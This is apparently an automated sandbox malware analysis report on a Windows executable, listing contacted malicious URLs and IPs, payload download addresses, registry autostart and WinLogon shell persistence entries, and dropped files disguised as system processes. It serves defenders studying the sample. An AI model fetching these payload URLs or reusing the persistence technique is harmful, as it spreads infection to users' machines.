demo.sdssoftltd.co.uk	103.67.236.191	true	true	2%, Virustotal, Browse	unknown
googlecode.l.googleusercontent.com	74.125.143.82	true	false		high
www.slymwhite.com	unknown	unknown	true		unknown
vccmd03.googlecode.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
vccmd01.t35.com	unknown	unknown	true		unknown
vccmd01.googlecode.com	unknown	unknown	true		unknown
vccmd02.googlecode.com	unknown	unknown	true		unknown
vccmd01.zxq.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://vccmd03.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78	true		unknown
http://vccmd02.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
http://vccmd01.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
www.evolvekitchendesign.com/ffw/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://vccmd01.t35.com/e.com/files/cmsys.gif	explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78.bin	os9tzxfmtz.exe , 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd03.googlecode.com/	explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gifllxw	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd02.googlecode.com/files/cmsys.gifi%I	explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gifVw	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin	os9tzxfmtz.exe	true	Avira URL Cloud: safe	unknown
http://103.141.138.118/bin_iOxAb78.bin	os9tzxfmtz.exe	false	Avira URL Cloud: safe	unknown
http://vccmd01.googlecode.com/files/cmsys.gift	explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.t35.com/cmsys.gif	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367305174.00000000007CA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gifr	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://vccmd01.t35.com/cmsys.gifnw	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gift	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2	svchost.exe, 00000007.00000002.495084605.0000017AED2B1000.00000004.00000001.sdmp	false		high
http://vccmd01.zxq.net/	explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd02.googlecode.com/	explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.t35.com/cmsys.gifusercontent.comn	explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/01.zxq.net/cmsys.gifusercontent.comu	explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000007.00000002.500311596.0000017AF2AD0000.00000002.00000001.sdmp	false		high
http://vccmd01.googlecode.com/files/cmsys.gifA	explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.t35.com/cmsys.gifr	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd03.googlecode.com/files/cmsys.gifP%n	explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/e.com/files/cmsys.gif	explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gifH	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd03.googlecode.com/files/cmsys.gifC%c	explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gif	explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	false		high
http://vccmd01.googlecode.com/	explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.67.236.191	demo.sdssoftltd.co.uk	India		135779	OASISGSSERVICES-ASOASISGSSERVICESIN	true
74.125.143.82	googlecode.l.googleusercontent.com	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385246
Start date:	12.04.2021
Start time:	08:58:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 15s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	os9TZxfmTZ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@420/11@11/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 34.7% (good quality ratio 28.3%) Quality average: 66.4% Quality standard deviation: 36.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): taskhostw.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 131.253.33.200, 13.107.22.200, 93.184.220.29, 20.82.210.154, 104.42.151.234, 92.122.145.220, 52.147.198.201, 184.30.24.56, 13.107.5.88, 13.107.42.23, 204.79.197.203, 51.103.5.186, 104.43.193.48, 13.88.21.125, 52.255.188.83, 20.49.157.6, 168.61.161.212, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, oneocsp-microsoft-com.a-0003.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, oneocsp.microsoft.com, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:59:17	API Interceptor	434x Sleep call for process: svchost.exe modified
08:59:18	API Interceptor	159x Sleep call for process: explorer.exe modified
08:59:18	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\system\explorer.exe RO
08:59:27	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\system\svchost.exe RO
08:59:45	Autostart	Run: WinLogon Shell C:\Windows\explorer.exe
08:59:55	Autostart	Run: WinLogon Shell c:\windows\system\explorer.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.67.236.191	Required Order Quantity.xlsx	Get hash	malicious	Browse
103.67.236.191	https://tny.sh/0ssxBTp	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.postphenomenon.com	UPySPH5MqR.exe	Get hash	malicious	Browse	35.186.238.101
demo.sdssoftltd.co.uk	Required Order Quantity.xlsx	Get hash	malicious	Browse	103.67.236.191

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OASISGSSERVICES-ASOASISGSSERVICESIN	Required Order Quantity.xlsx	Get hash	malicious	Browse	103.67.236.191
	0f9zzITIbk.exe	Get hash	malicious	Browse	103.67.239.158
	Emmmmmmm.doc	Get hash	malicious	Browse	103.67.239.35

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	malevolo.ps1	Get hash	malicious	Browse	103.67.236.191
	shipping document.exe	Get hash	malicious	Browse	103.67.236.191
	Statement-ID261179932209970.vbs	Get hash	malicious	Browse	103.67.236.191
	Alexandra38.docx	Get hash	malicious	Browse	103.67.236.191
	rRobw1VVRP.exe	Get hash	malicious	Browse	103.67.236.191
	Tmd7W7qwQw.dll	Get hash	malicious	Browse	103.67.236.191
	SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exe	Get hash	malicious	Browse	103.67.236.191
	documents-351331057.xlsm	Get hash	malicious	Browse	103.67.236.191
	documents-1819557117.xlsm	Get hash	malicious	Browse	103.67.236.191
	mail_6512365134_7863_202104108.html	Get hash	malicious	Browse	103.67.236.191
	Copia bancaria de swift.exe	Get hash	malicious	Browse	103.67.236.191
	SecuriteInfo.com.Trojan.GenericKD.36659493.29456.exe	Get hash	malicious	Browse	103.67.236.191
	SecuriteInfo.com.Trojan.Siggen12.64197.30705.exe	Get hash	malicious	Browse	103.67.236.191
	#Ud83d#Udcde973.htm	Get hash	malicious	Browse	103.67.236.191
	3vQD6TIYA1.exe	Get hash	malicious	Browse	103.67.236.191
	SOLICITUD DE PRESUPUESTO 08-04-2021#U00b7pdf.exe	Get hash	malicious	Browse	103.67.236.191
	XN123gfQJQ.exe	Get hash	malicious	Browse	103.67.236.191
	documento.xlsb	Get hash	malicious	Browse	103.67.236.191
	securedmessage.htm	Get hash	malicious	Browse	103.67.236.191

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\icsys.icn.exe	Required Order Quantity.xlsx	Get hash	malicious	Browse
C:\Users\user\Desktop\os9tzxfmtz.exe	Required Order Quantity.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5981930978381301
Encrypted:	false
SSDEEP:	6:b2Hlek1GaD0JOCEfMuaaD0JOCEfMKQmDmz6Al/gz2cE0fMbhEZolrRSQ2hyYIIT:bITGaD0JcaaD0JwQQDAg/0bjSQJ
MD5:	3FF40158CC61983373CF36EF67FA5F3A
SHA1:	1C070E31E7F2CFD558B7ADD1F9EA502FC7681D51
SHA-256:	FF87E5762839EF68C36295267F9FC9C56735A00420517C5D31DA30245EDBF2BE
SHA-512:	C338ACE12FE6ED4021560CA03176D11A24AEC2FD151DDC4D102DADD0C9654925AE5AD4591FD0AB194E09B66540CB46D48A4D3A30B4B243CA5D4711864B90A1D4
Malicious:	false
Preview:	....E..h..(......;...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................;...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x2ec74ff6, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.0965717597552794
Encrypted:	false
SSDEEP:	12:wz0+1wO4blipvEDqKiz0+1wO4blipvEDqK:1CuC
MD5:	84CB8F1D0AA12369424E2BD368E2082B
SHA1:	92EC09DE58D6A1C19F4471BE7ED27BE8599F100A
SHA-256:	8119A21897C9BEBAE99A2D527565CD56AC6406507B9EE0EC2FCCDA8A6D04F1A7
SHA-512:	474154CCB83ED9ACA1885CD819CFB9B07A7D1C32F26E74E76B822D947218E429A10A22F8F96A9D33F4B2F0C6E4B5097E958588349BEC73EB227D97A7DE9F4D5F
Malicious:	false
Preview:	..O.... ................e.f.3...w........................&..........w...;...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................Y....;...yo.................y....;...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.110654624099335
Encrypted:	false
SSDEEP:	3:OTEv0eSc0Ql7l/bJdAti06qpvL//all:j0eSc0W7t4lfvL/G
MD5:	4F51290AA2ADAE187DEE890D4CB62140
SHA1:	44D9B5F0B2B234E3DE9D5CB7B4579DC6A821D874
SHA-256:	CF4231E259F0FC4FEF6F95B50EB4F27A69D56DFE02DD50CA9499F135722B5222
SHA-512:	B17FB738EC192299E7DB0A878E64E69302306D75BA2686CCC6384685377C61116F888EF683CEB12B58CAA5C2E4EF75CD5382EF9F276D8FD9E93FD364D6A550E3
Malicious:	false
Preview:	_........................................3...w...;...y.......w...............w.......w....:O.....w..................y....;...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\icsys.icn.exe Download File
Process:	C:\Users\user\Desktop\os9TZxfmTZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211759
Entropy (8bit):	6.104338436807435
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unR:zvEN2U+T6i5LirrllHy4HUcMQY6a
MD5:	D5809935B2F8A4579AAADCA96C2920EE
SHA1:	1371253A9877420D37FB912C5C80C0F63871FBCE
SHA-256:	F6B230F7A36830E443AEAF69C1826F3188C8C2247C6711D0148E12EC5A29DBB1
SHA-512:	3F1ECFF56C7687FD5EC726DBFC2BC1914942C8675169EC8B039D79DE5A050BBA4CD850DF95C836618B6D8F55E160A139836C90E8474CEE0B36247DA8F51F6287
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Required Order Quantity.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\stsys.exe Download File
Process:	C:\Windows\System\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211745
Entropy (8bit):	6.100356440189972
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6un8:zvEN2U+T6i5LirrllHy4HUcMQY6/
MD5:	D570E31A24B7415D0619C4A585BD3C38
SHA1:	2F7F0BE4ACB59EC48978BA0494D63408049665BF
SHA-256:	D50C1CA750EE8A58D6B0E45239D3BA48739AF16A3ED62297B14A28E4E29A8C15
SHA-512:	B36E53E1F2B0AE65C97B4711A71F94D7AF14BFDD20BBFDFAC5F77BAA6CD19A0EA8C7964864A7439BFE25DEE810663AA2B35D6326662B5072019498BD81B39192
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\mrsys.exe Download File
Process:	C:\Windows\System\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211930
Entropy (8bit):	6.091787060312714
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unb:zvEN2U+T6i5LirrllHy4HUcMQY6O
MD5:	81C8CF522EB0BD4D1B5E8CA55361FDC4
SHA1:	E694355B32CC8ECF14F87C91EF7D275112DCA8F2
SHA-256:	D26AD3255318703C5B8918F2B64261F59B61DF78EE489C39386A39B54EAC4540
SHA-512:	129EEA61C24DD5244C19A5CB935BD2BBB92DD64F902B60B20CA57C8FEA82A260BE37E80FE683577CE5B21ED7D750BE233A55A3D1C562BDC0C8933FB135719337
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\os9tzxfmtz.exe Download File
Process:	C:\Users\user\Desktop\os9TZxfmTZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	5.217490030056356
Encrypted:	false
SSDEEP:	3072:/wbOaoi7MALuifOWr9/yPFk9vYDoogRIBN0z0noojfIVAdaybDIEaIJqAT15MMbD:mOaoi7ru0qFkBYDoogRI30z0noojfIV/
MD5:	ABBFBEC83B67CA488DF807F74D5773B7
SHA1:	657177EB270DAB50FB19A14656EAB098E318B152
SHA-256:	446FFBE53145C93AC0D5F2201A7602846D272FD772936583125B0BD0D331D04A
SHA-512:	4A6DB34610B786F711BB231620D7AFAB20DC4453F036736812772E16148E0BAD8A64A50347A9BB34B9028796A13DABEA95302C2A2D265A4B7AF0A613B754F026
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: Required Order Quantity.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L......V.................`... ......\........p....@.................................M........................................a..(.......p...................................................................(... ....................................text...8W.......`.................. ..`.data........p.......p..............@....rsrc...p...........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System\explorer.exe Download File
Process:	C:\Users\user\AppData\Local\icsys.icn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211802
Entropy (8bit):	6.102574031112325
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unM:zvEN2U+T6i5LirrllHy4HUcMQY6l
MD5:	0CE3C90CA3FCFCD7C234D580BF184F0A
SHA1:	52C9E1D4C591259CD9FE3C04D84EC0696E833DD5
SHA-256:	83D6C50DB745CBC52EF5BC86F48C0398E864A13B998DB08E3B8EF5BCB2B9DD97
SHA-512:	61B835105FFC3B9E97E50AAD04FD82660D75652CC599626A9F820E147B91CC63823B7049ADB22C4B1C71787126993CC786BC93BE35CBBAAB3EA9C3AF4AEA1A09
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System\spoolsv.exe Download File
Process:	C:\Windows\System\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211955
Entropy (8bit):	6.09635155994254
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unNS:zvEN2U+T6i5LirrllHy4HUcMQY66S
MD5:	299A35006AE04B5DD9C7BC9D0B30CA9F
SHA1:	38D006687245E192B465E2A3A2A435C81D2B3099
SHA-256:	99385BF91E548A267EFC10B6AA18782C400C8787C2CD36DC6A3EF3611D6691B6
SHA-512:	B9766AB9F812D9F57D7351006BD773BEEA1D0A0311472182533DEF66CD94A7C352994BDB1D9C3F840FF0266B379FF08A648D41DAA8AF2FD7156D49D1BD3AA282
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System\svchost.exe Download File
Process:	C:\Windows\System\spoolsv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211825
Entropy (8bit):	6.1053788607197905
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unf:zvEN2U+T6i5LirrllHy4HUcMQY6w
MD5:	7718CCEC6D9968F3EFF22F24955DFD38
SHA1:	F375393B0A98B66D91BA962402217633DD7D0E81
SHA-256:	79128A6F1CAE96F1A8C010969F501606A094846E314FE8BEEDC20A5D34885926
SHA-512:	6B8D3895C583BF6BF50A789FD13310723E902714173EBDF547BFEC943E6C243FA5803D67C84889F671E3A602CCF8E556EB9D993CBCB9EBD2FEA28D4D07A65238
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.8128747167355925
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	os9TZxfmTZ.exe
File size:	379720
MD5:	ad0c93b574bb947cff15483eda82811e
SHA1:	ad379c5a86bf646c4a079e737a364ab352107e5b
SHA256:	bcaac39113bd17158fe86a77328f97e9c3fa14860c9c4449a8ae0768c85243f4
SHA512:	b31231362967089a28f24f84dfd185fdb9e2fc940eabd112beff03968993f9d7a820adc1db83a6775a3473c8ff2fad8d067c7ca16b4a7e7c57337450bedfc109
SSDEEP:	6144:zvEN2U+T6i5LirrllHy4HUcMQY6ZOaoi7ru0qFkBYDoogRI30z0noojfIVAdayb1:zENN+T5xYrllrU7QY65oiHuhGYDoogR0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x403670
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4DF7AFFC [Tue Jun 14 19:01:16 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	98f67c550a7da65513e63ffd998f6b2e

Entrypoint Preview

Instruction
push 00403ED4h
call 00007F6704D66AB5h
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx-7FFA577Dh], dl
adc eax, dword ptr [bx-4Fh]
push edx
xchg eax, ebx
pop eax
jnc 00007F6704D66A4Dh
nop
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax+00h], al
hlt
test al, F6h
add byte ptr [edi+69h], dl
outsb
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
movsd
test byte ptr [eax], 00000019h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], cl
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [ebp-4E810EB2h], al
pushfd
call far 1AF7h : C9C2984Bh
jo 00007F6704D66A6Bh
cmp byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax-58000000h], bl
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ecx+ebp*4], bh
test byte ptr [eax], 00000001h
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax-5Bh], ah
test byte ptr [eax], 0000001Bh
